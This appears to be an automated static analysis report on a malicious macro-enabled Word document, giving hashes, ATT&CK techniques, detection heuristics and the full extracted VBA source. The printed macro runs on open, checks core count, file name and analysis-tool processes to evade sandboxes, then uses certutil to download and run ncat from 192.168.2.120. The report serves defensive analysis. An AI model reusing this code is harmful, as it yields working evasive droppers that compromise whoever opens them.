Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e557d7b8b1b61c51…

MALICIOUS

Office (OOXML)

21.5 KB Created: 2021-06-03 14:32:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-13
MD5: bc50096c7eb7123e03734e809addb0d5 SHA-1: 38bed99896eb26b60dd845baea21e30d0e990955 SHA-256: e557d7b8b1b61c51246f72c06f45289abf52a34a0640a6a5935655d80ff39d48
430 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File T1071.001 Web Protocols T1105 Ingress Tool Transfer

The sample contains VBA macros that execute upon opening, specifically targeting analysis environments by checking for virtual machine artifacts and specific process names. If the environment appears clean, the macro proceeds to execute a command, likely to download and run a secondary payload. The ClamAV detection name 'Win.Downloader.CertutilURLCache-6335698-0' suggests the use of certutil for downloading, aligning with the downloader pattern.

Heuristics 10

  • ClamAV: Win.Downloader.CertutilURLCache-6335698-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Downloader.CertutilURLCache-6335698-0
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            Dim objShell
            Set objShell = CreateObject("WScript.Shell")
            objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
            Set objShell = CreateObject("WScript.Shell")
            objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Dim objShell
            Set objShell = CreateObject("WScript.Shell")
            objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
        Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
            Set objShell = CreateObject("WScript.Shell")
            objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "NewMacros"
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.2.120/ncat1.exe In document text (OOXML body / shared strings)
    • http://1�92.168.�In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2398 bytes
SHA-256: 7a399a1abb88ed4d56552c0089db87ae69d6a2bfc623ff3e645db5a99ca41d00
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

    Dim i
    badCores = 0

    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
    
    For Each objItem In colItems
    
            If objItem.NumberOfCores < 3 Then
                badCores = True
            End If
        
    Next

    If badCores = True Then
        
        i = 1
        
    Else
            
            checkPreciseFileName

        
    End If


 

End Sub

Private Function MSG()
'Sub MSG()
 MsgBox ("TEST")
End Function


Public Sub checkPreciseFileName()

    'MsgBox "[*] Checking Precise Filename ..."
    
    badName = False

  
    If ActiveDocument.Name <> "certutil2_0_58_only_certutil_TEST2_cores_exact_filename_badtask.docm" Then
            badName = True
    End If
 
    If badName Then
        i = 1
       'MsgBox "DETECTED"
       
    Else
    
        checkTasks
        
        
        'MsgBox "OK"
    End If
    
End Sub



Public Sub checkTasks()

    'printMsg "[*] Checking Application.Tasks.Name ..."

    badTask = False
    badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
     'badTaskNames = Array("fiddler", "vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer")
     'badTaskNames = Array("visual basic")
    For Each Task In Application.Tasks
    
        For Each badTaskName In badTaskNames
            If InStr(LCase(Task.Name), badTaskName) > 0 Then
                badTask = True
            End If
        Next
        
    Next

    If badTask Then
        
        MsgBox "DETECTED"
    Else
        
        Dim objShell
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"
        
        
    End If
    
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 24576 bytes
SHA-256: a1c082b6db89851b3509dd347cd9d3b261caefa53b9c6fdc24680fe958a7191e
Detection
ClamAV: Win.Downloader.CertutilURLCache-6335698-0
Obfuscation or payload: unlikely